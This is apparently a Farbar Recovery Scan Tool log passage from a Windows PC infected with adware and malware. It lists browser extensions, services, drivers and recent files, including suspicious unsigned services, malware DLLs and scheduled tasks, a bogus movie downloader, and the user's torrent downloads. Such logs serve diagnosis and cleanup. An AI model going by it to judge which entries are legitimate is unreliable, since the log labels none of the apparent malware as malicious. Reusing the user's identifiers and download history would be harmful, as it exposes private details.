CHR Extension: (Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-09]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-09]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-09]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-09]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-09]
CHR Profile: C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1
CHR Extension: (Google Slides) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-25]
CHR Extension: (Google Docs) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-25]
CHR Extension: (Google Drive) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-25]
CHR Extension: (YouTube) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-25]
CHR Extension: (Google Search) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-25]
CHR Extension: (Google Sheets) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-25]
CHR Extension: (SiteAdvisor) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-11-25]
CHR Extension: (Google Docs Offline) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-25]
CHR Extension: (Taplika New Tab) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lfkjojacgdjkninepeghaamnapdjmlfn [2015-11-25]
CHR Extension: (Skype Click to Call) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2015-11-25]
CHR Extension: (Chrome Web Store Payments) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-25]
CHR Extension: (Gmail) - C:\Users\owner\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-25]
CHR HKLM\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [edfhabmbbhdcdpnoilchepfojmdeannd] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fcgnigmofekcllgbiejhmigggmgehkip] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2015-12-11]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
S2 ApplicationHosting; C:\ProgramData\\ApplicationHosting\\ApplicationHosting.exe [538112 2016-01-09] () [File not signed]
S2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [211584 2012-08-10] (Qualcomm Atheros Commnucations) [File not signed]
S2 BrcmCardReader; C:\Program Files\Broadcom\MemoryCard\BrcmCardReader.exe [176640 2012-08-20] (Broadcom Corp.) [File not signed]
S2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
S2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
S2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Cloud\CCDMonitorService.exe [2435728 2012-08-23] (Acer Incorporated)
S2 cmdidx; C:\Program Files\cmdidx\cmdidx.exe [383488 2016-01-09] () [File not signed]
S3 DeviceFastLaneService; C:\Program Files\Acer\Acer Device Fast-lane\DeviceFastLaneSvc.exe [468624 2012-08-22] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [658576 2012-08-22] (Acer Incorporated)
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
S2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
S2 McAfee SiteAdvisor Service; C:\Program Files (x86)\McAfee\SiteAdvisor\McSACore.exe [157928 2015-12-02] (McAfee, Inc.)
S2 NTI IScheduleSvc; C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe [259136 2012-11-02] (NTI Corporation)
S2 RfButtonDriverService; C:\Windows\RfBtnSvc64.exe [93296 2012-10-09] (Dritek System INC.)
S3 Steam Client Service; C:\Program Files (x86)\Common Files\Steam\SteamService.exe [836176 2015-12-14] (Valve Corporation) [File not signed]
S2 Task Server; C:\Program Files\Task Server\TaskServer.exe [796160 2016-01-09] (Copyright © Microsoft 2015) [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-03] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-03] (Microsoft Corporation)
S2 ZAtheros Wlan Agent; C:\Program Files (x86)\Qualcomm Atheros\Ath_WlanAgent.exe [81536 2012-07-31] (Atheros) [File not signed]
S2 extradoynldownkzhd; C:\Users\owner\AppData\Local\Donelectronics.exe aoonloaduo extradoynldownkzhd [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [76952 2012-08-10] (Qualcomm Atheros)
S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows (R) Win 7 DDK provider)
S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows (R) Win 7 DDK provider)
R0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-01-10] (Malwarebytes)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
S3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [37960 2015-12-02] (McAfee, Inc.)
R3 Ps2Kb2Hid; C:\Windows\System32\drivers\aPs2Kb2Hid.sys [26736 2012-10-09] (Dritek System Inc.)
S3 usbrndis6; C:\Windows\system32\DRIVERS\usb80236.sys [20992 2013-08-22] (Microsoft Corporation)
S3 voxaldriver; C:\Windows\system32\DRIVERS\voxaldriverx64.sys [34512 2015-10-26] ()
S3 vpnva; C:\Windows\system32\DRIVERS\vpnva64-6.sys [52592 2014-10-16] (Cisco Systems, Inc.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44024 2015-02-03] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [264000 2015-02-03] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-01-10 20:45 - 2016-01-10 20:45 - 00000000 ____D C:\Program Files\Task Service
2016-01-10 20:44 - 2016-01-10 20:44 - 00000000 ____D C:\Program Files\Scan Service
2016-01-10 20:41 - 2016-01-10 20:41 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2016-01-10 18:13 - 2016-01-10 21:12 - 00000000 ____D C:\FRST
2016-01-10 15:07 - 2016-01-10 20:45 - 00071168 _____ (Microsoft) C:\WINDOWS\system32\WindowsLock.exe
2016-01-10 15:07 - 2016-01-10 20:44 - 00140288 _____ (Microsoft) C:\WINDOWS\system32\MalwareScanner.exe
2016-01-10 14:30 - 2016-01-10 15:21 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-01-10 14:30 - 2016-01-10 14:56 - 00001112 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-01-10 14:30 - 2016-01-10 14:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-01-10 14:30 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-01-10 14:30 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-01-09 21:13 - 2016-01-10 20:49 - 00000000 ____D C:\Users\owner\AppData\Local\CrashDumps
2016-01-09 21:08 - 2016-01-10 14:56 - 00001422 _____ C:\Users\owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-01-09 21:00 - 2016-01-09 21:00 - 00000000 ____D C:\ProgramData\fc7235fa-41a3-1
2016-01-09 20:58 - 2016-01-09 20:58 - 00000000 ____D C:\ProgramData\ad8a10da-14d7-1
2016-01-09 20:57 - 2016-01-09 20:57 - 00000000 ____D C:\Program Files (x86)\ExploreTech
2016-01-09 20:11 - 2016-01-09 20:11 - 00000000 ____D C:\Program Files (x86)\predm
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\Users\owner\AppData\Local\NPE
2016-01-09 19:54 - 2016-01-09 19:54 - 00000000 ____D C:\ProgramData\Norton
2016-01-09 19:33 - 2016-01-10 21:13 - 00916216 _____ C:\WINDOWS\ntbtlog.txt
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (5).exe
2016-01-09 18:45 - 2016-01-09 18:45 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (4).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (3).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (2).exe
2016-01-09 18:43 - 2016-01-09 18:43 - 00002782 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-01-09 18:42 - 2016-01-10 14:56 - 00000876 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-09 18:42 - 2016-01-09 18:43 - 00000000 ____D C:\Program Files\CCleaner
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513.exe
2016-01-09 18:42 - 2016-01-09 18:42 - 06805440 _____ (Piriform Ltd) C:\Users\owner\Downloads\ccsetup_513 (1).exe
2016-01-09 18:16 - 2016-01-09 18:16 - 00003242 _____ C:\WINDOWS\System32\Tasks\IBUpd2
2016-01-09 18:15 - 2016-01-09 18:15 - 00022184 _____ (Corporation) C:\WINDOWS\system32\Drivers\sdfhgdf.sys
2016-01-09 18:15 - 2016-01-09 18:15 - 00003406 _____ C:\WINDOWS\System32\Tasks\RSPro
2016-01-09 18:14 - 2016-01-09 18:14 - 00000008 _____ C:\END
2016-01-09 18:09 - 2016-01-10 21:08 - 00000282 _____ C:\WINDOWS\Tasks\System HealerStartUp.job
2016-01-09 18:09 - 2016-01-09 19:14 - 00000282 _____ C:\WINDOWS\Tasks\System HealerPeriod.job
2016-01-09 18:09 - 2016-01-09 18:09 - 00003568 _____ C:\WINDOWS\System32\Tasks\System Healer Task
2016-01-09 18:09 - 2016-01-09 18:09 - 00003232 _____ C:\WINDOWS\System32\Tasks\SystemHealer Monitor
2016-01-09 18:09 - 2016-01-09 18:09 - 00002832 _____ C:\WINDOWS\System32\Tasks\System HealerPeriod
2016-01-09 18:09 - 2016-01-09 18:09 - 00002536 _____ C:\WINDOWS\System32\Tasks\System HealerStartUp
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-78e1-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\fc7235fa-3443-1
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-2473-0
2016-01-09 18:09 - 2016-01-09 18:09 - 00000000 ____D C:\ProgramData\ad8a10da-09a5-1
2016-01-09 18:00 - 2016-01-09 18:00 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-01-09 17:18 - 2016-01-09 17:18 - 00000015 _____ C:\WINDOWS\system32\config.conf
2016-01-09 17:18 - 2016-01-09 17:18 - 00000000 ____D C:\WINDOWS\system32\jurk
2016-01-09 17:10 - 2016-01-09 17:59 - 00000000 ____D C:\Users\owner\AppData\Local\DailyWiki
2016-01-09 17:08 - 2016-01-09 17:57 - 00003426 _____ C:\WINDOWS\System32\Tasks\Olunnuag
2016-01-09 16:42 - 2016-01-10 21:08 - 00000280 _____ C:\WINDOWS\Tasks\Goose.job
2016-01-09 16:42 - 2016-01-09 19:26 - 00004720 _____ C:\WINDOWS\SysWOW64\Kefzha.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\SysWOW64\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 19:26 - 00002440 _____ C:\WINDOWS\system32\KefzhaOff.ini
2016-01-09 16:42 - 2016-01-09 16:42 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foebyyc
2016-01-09 16:42 - 2016-01-09 16:42 - 00002474 _____ C:\WINDOWS\System32\Tasks\Goose
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\Company
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Tempfolder
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds365
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\Users\owner\AppData\Local\Birds
2016-01-09 16:42 - 2016-01-09 16:42 - 00000000 ____D C:\uninst
2016-01-09 16:42 - 2016-01-09 15:28 - 00768376 _____ C:\WINDOWS\system32\Kefzha64.dll
2016-01-09 16:42 - 2016-01-09 15:28 - 00289144 _____ C:\WINDOWS\SysWOW64\Kefzha.dll
2016-01-09 16:38 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Setup Support for Looksafe
2016-01-09 16:38 - 2016-01-09 16:38 - 00003690 _____ C:\WINDOWS\System32\Tasks\GTNU_635879831232953538
2016-01-09 16:38 - 2016-01-09 16:38 - 00003338 _____ C:\WINDOWS\System32\Tasks\GNU_635879831225933307
2016-01-09 16:36 - 2016-01-09 16:36 - 00004956 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010P
2016-01-09 16:36 - 2016-01-09 16:36 - 00004944 _____ C:\WINDOWS\System32\Tasks\DfGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837
2016-01-09 16:36 - 2016-01-09 16:36 - 00004932 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-4287834998-254447837-4126873412-1000Main
2016-01-09 16:36 - 2016-01-09 16:36 - 00004930 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskAdminS-1-5-21-4287834998-254447837-4126873412-1010
2016-01-09 16:36 - 2016-01-09 16:36 - 00004926 _____ C:\WINDOWS\System32\Tasks\AdGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412-1010D
2016-01-09 16:36 - 2016-01-09 16:36 - 00004906 _____ C:\WINDOWS\System32\Tasks\ZcGoogleUpdateTaskAdminTask-1-5-21-4287834998-254447837-4126873412
2016-01-09 16:36 - 2016-01-09 16:36 - 00003258 _____ C:\WINDOWS\System32\Tasks\Easy Driver Pro Schedule
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\WINDOWS\system32\Express
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Server
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Task Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Svc Host
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\IIS
2016-01-09 16:36 - 2016-01-09 16:36 - 00000000 ____D C:\Program Files\Explore
2016-01-09 16:34 - 2016-01-09 16:34 - 00003828 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1452386042
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Roaming\Opera Software
2016-01-09 16:34 - 2016-01-09 16:34 - 00000000 ____D C:\Users\owner\AppData\Local\Opera Software
2016-01-09 16:33 - 2016-01-09 21:01 - 00000000 ____D C:\Program Files (x86)\Opera
2016-01-09 16:33 - 2016-01-09 16:33 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e
2016-01-09 16:32 - 2016-01-09 21:00 - 00000000 ____D C:\Program Files (x86)\Probit Software
2016-01-09 16:32 - 2016-01-09 16:32 - 00000000 ____D C:\Program Files\cmdidx
2016-01-09 16:31 - 2016-01-10 20:54 - 00000000 ____D C:\ProgramData\ApplicationHosting
2016-01-09 16:31 - 2016-01-09 16:31 - 05142944 _____ (hxxp://spring-files.com) C:\Users\owner\Downloads\Into_the_Wild_2007_1080p_BrRip_x264_-_YIFY_downloader.exe
2016-01-09 16:31 - 2016-01-09 16:31 - 00004144 _____ C:\WINDOWS\System32\Tasks\WebDnsio2-daily
2016-01-09 16:31 - 2016-01-09 16:29 - 00000967 _____ C:\WINDOWS\system32\Drivers\etc\hp.bak
2016-01-09 16:30 - 2016-01-09 16:31 - 00000000 ____D C:\Program Files (x86)\WebDnsio
2016-01-09 16:30 - 2016-01-09 16:30 - 00005164 _____ C:\WINDOWS\System32\Tasks\WebDnsio2
2016-01-09 16:29 - 2016-01-09 16:29 - 01017652 _____ C:\Users\owner\Downloads\Into The Wild 2007 1080p BrR Downloader.rar
2016-01-09 16:29 - 2016-01-09 16:29 - 00000000 ___HD C:\Program Files\AmazingTab
2016-01-09 16:27 - 2016-01-09 16:30 - 00000022 _____ C:\Users\owner\Downloads\into.the.wild.2007.1080p..zip-.zip
2016-01-09 15:59 - 2016-01-09 15:59 - 00033072 _____ C:\Users\owner\Downloads\Deliver Us from Evil 2014.torrent
2016-01-09 15:40 - 2016-01-09 15:40 - 00019657 _____ C:\Users\owner\Downloads\[kat.cr]devil.s.knot.2013.1080p.brrip.x264.yify.torrent
2016-01-09 15:22 - 2016-01-09 15:22 - 00013243 _____ C:\Users\owner\Downloads\[kat.cr]enemy.2013.1080p.x264.dd5.1.en.nl.subs.asian.torrenz.torrent
2016-01-09 14:59 - 2016-01-09 14:59 - 00019431 _____ C:\Users\owner\Downloads\[kat.cr]leviathan.2014.1080p.brrip.x264.ac3.jyk.torrent
2016-01-09 14:38 - 2016-01-09 14:38 - 00118580 _____ C:\Users\owner\Downloads\[kat.cr]meru.2015.brrip.xvid.ac3.evo.torrent
2016-01-09 14:18 - 2016-01-09 14:18 - 00087738 _____ C:\Users\owner\Downloads\[kat.cr]selma.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 13:44 - 2016-01-09 13:44 - 00019546 _____ C:\Users\owner\Downloads\[kat.cr]dilwale.2015.desiscr.950mb.torrent
2016-01-09 13:29 - 2016-01-09 13:29 - 00028395 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2.hdrip.torrent
2016-01-09 13:16 - 2016-01-09 13:16 - 00192082 _____ C:\Users\owner\Downloads\[kat.cr]sinister.2012.bdrip.xvid.eng.ita.ac3.torrent
2016-01-09 12:46 - 2016-01-09 12:46 - 00067266 _____ C:\Users\owner\Downloads\[kat.cr]straight.outta.compton.2015.dc.1080p.bluray.h264.aac.rarbg.torrent
2016-01-09 12:19 - 2016-01-09 12:19 - 00140864 _____ C:\Users\owner\Downloads\[kat.cr]whiplash.2014.dvdrip.aac.ita.eng.x264.lizaliza.mkv.torrent
2016-01-09 12:08 - 2016-01-09 12:08 - 00017330 _____ C:\Users\owner\Downloads\[kat.cr]chef.2014.2ndtimearound.torrent
2016-01-09 12:07 - 2016-01-09 12:07 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (2).torrent
2016-01-09 12:06 - 2016-01-09 12:06 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw (1).torrent
2016-01-09 12:05 - 2016-01-09 12:05 - 00011786 _____ C:\Users\owner\Downloads\[kat.cr]a.most.wanted.man.2014.720p.bluray.dts.x264.gknbynw.torrent
2016-01-09 11:50 - 2016-01-09 11:50 - 00019667 _____ C:\Users\owner\Downloads\[kat.cr]nightcrawler.2014.1080p.brrip.x264.yify.torrent
2016-01-09 11:30 - 2016-01-09 11:30 - 00014728 _____ C:\Users\owner\Downloads\[kat.cr]diablo.2016.hdrip.xvid.ac3.evo.torrent
2016-01-09 10:55 - 2016-01-09 10:55 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu (1).torrent
2016-01-09 10:54 - 2016-01-09 10:54 - 00019457 _____ C:\Users\owner\Downloads\[kat.cr]fifty.shades.of.grey.2015.720p.bluray.x264.nezu.torrent
2016-01-09 10:45 - 2016-01-09 10:45 - 00031210 _____ C:\Users\owner\Downloads\[kat.cr]the.little.prince.2015.bluray.1080p.dts.hd.ma.5.1.x264.mteam.mkv.torrent
2016-01-09 10:21 - 2016-01-09 10:21 - 00010218 _____ C:\Users\owner\Downloads\[kat.cr]mad.max.fury.road.2015.720p.brrip.x264.yify.torrent
2016-01-09 10:12 - 2016-01-09 10:12 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg (1).torrent
2016-01-09 10:10 - 2016-01-09 10:10 - 00057633 _____ C:\Users\owner\Downloads\[kat.cr]burnt.2015.brrip.xvid.etrg.torrent
2016-01-09 09:54 - 2016-01-09 09:54 - 00019417 _____ C:\Users\owner\Downloads\[kat.cr]san.andreas.2015.1080p.brrip.x264.yify.torrent
2016-01-09 09:38 - 2016-01-09 09:38 - 00106326 _____ C:\Users\owner\Downloads\[kat.cr]the.sponge.bob.movie.sponge.out.of.water.2015.cam.xvid.vain.torrent
2016-01-09 09:32 - 2016-01-09 09:32 - 00022617 _____ C:\Users\owner\Downloads\[kat.cr]divergent.2014.1080p.bluray.x264.ac3.dd5.1.inam.torrent
2016-01-09 09:12 - 2016-01-09 09:12 - 00120298 _____ C:\Users\owner\Downloads\[kat.cr]spy.2015.hc.hdrip.xvid.ac3.evo.torrent
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (2).tif
2016-01-08 11:44 - 2016-01-08 11:44 - 14655654 _____ C:\Users\owner\Downloads\scan4 (1).tif
2016-01-08 11:43 - 2016-01-08 11:43 - 14655654 _____ C:\Users\owner\Downloads\scan4.tif
2016-01-07 07:28 - 2016-01-10 20:45 - 00000000 ____D C:\Users\owner\AppData\LocalLow\uTorrent
2016-01-04 17:09 - 2016-01-08 20:25 - 00000000 ____D C:\Users\owner\AppData\Roaming\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files\OBS
2016-01-04 17:08 - 2016-01-04 17:09 - 00000000 ____D C:\Program Files (x86)\OBS
2016-01-04 17:04 - 2016-01-04 17:06 - 68037144 _____ C:\Users\owner\Downloads\OBS_0_657b_With_Browser_Installer.exe
2016-01-03 21:42 - 2016-01-10 14:56 - 00001619 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-01-03 21:42 - 2016-01-03 21:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends
2016-01-03 21:42 - 2008-07-12 08:18 - 03851784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DX9_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 01493528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_39.dll
2016-01-03 21:42 - 2008-07-12 08:18 - 00467984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3dx10_39.dll
2016-01-03 21:23 - 2016-01-03 21:42 - 00000000 __SHD C:\AI_RecycleBin
2015-12-31 09:58 - 2016-01-08 11:45 - 00076288 ___SH C:\Users\owner\Downloads\Thumbs.db
2015-12-28 17:04 - 2015-12-28 17:04 - 09479872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2015-12-28 10:18 - 2015-12-28 10:18 - 00000000 ____D C:\Users\owner\AppData\Roaming\Gyazo
2015-12-28 10:16 - 2015-12-29 08:17 - 00000000 ____D C:\Program Files (x86)\Gyazo
2015-12-28 10:16 - 2015-12-28 10:16 - 09986504 _____ (Nota Inc. ) C:\Users\owner\Downloads\Gyazo-3.1.6.exe
2015-12-28 10:16 - 2015-12-28 10:16 - 00003400 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachineDaily
2015-12-28 10:16 - 2015-12-28 10:16 - 00003274 _____ C:\WINDOWS\System32\Tasks\GyazoUpdateTaskMachine
2015-12-28 10:16 - 2015-12-28 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Gyazo
2015-12-27 17:52 - 2015-12-27 17:52 - 00000000 ____D C:\Users\owner\AppData\Local\Hewlett-Packard
2015-12-27 17:28 - 2015-12-27 17:28 - 00000000 ____D C:\Users\owner\AppData\Roaming\Hewlett-Packard
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\System.sav
2015-12-27 17:22 - 2015-12-27 17:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-12-27 17:21 - 2015-12-27 17:21 - 00000000 ____D C:\Users\owner\AppData\Roaming\hpqLog
2015-12-27 17:05 - 2015-12-27 17:05 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-12-27 17:04 - 2015-12-27 17:22 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-12-27 17:02 - 2015-12-27 17:02 - 03795680 _____ (Oleg N. Scherbakov) C:\Users\owner\Downloads\HPSupportSolutionsFramework-12.0.30.219.exe
2015-12-21 23:27 - 2016-01-10 14:56 - 00002707 _____ C:\Users\Public\Desktop\Skype.lnk
2015-12-21 23:27 - 2015-12-21 23:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
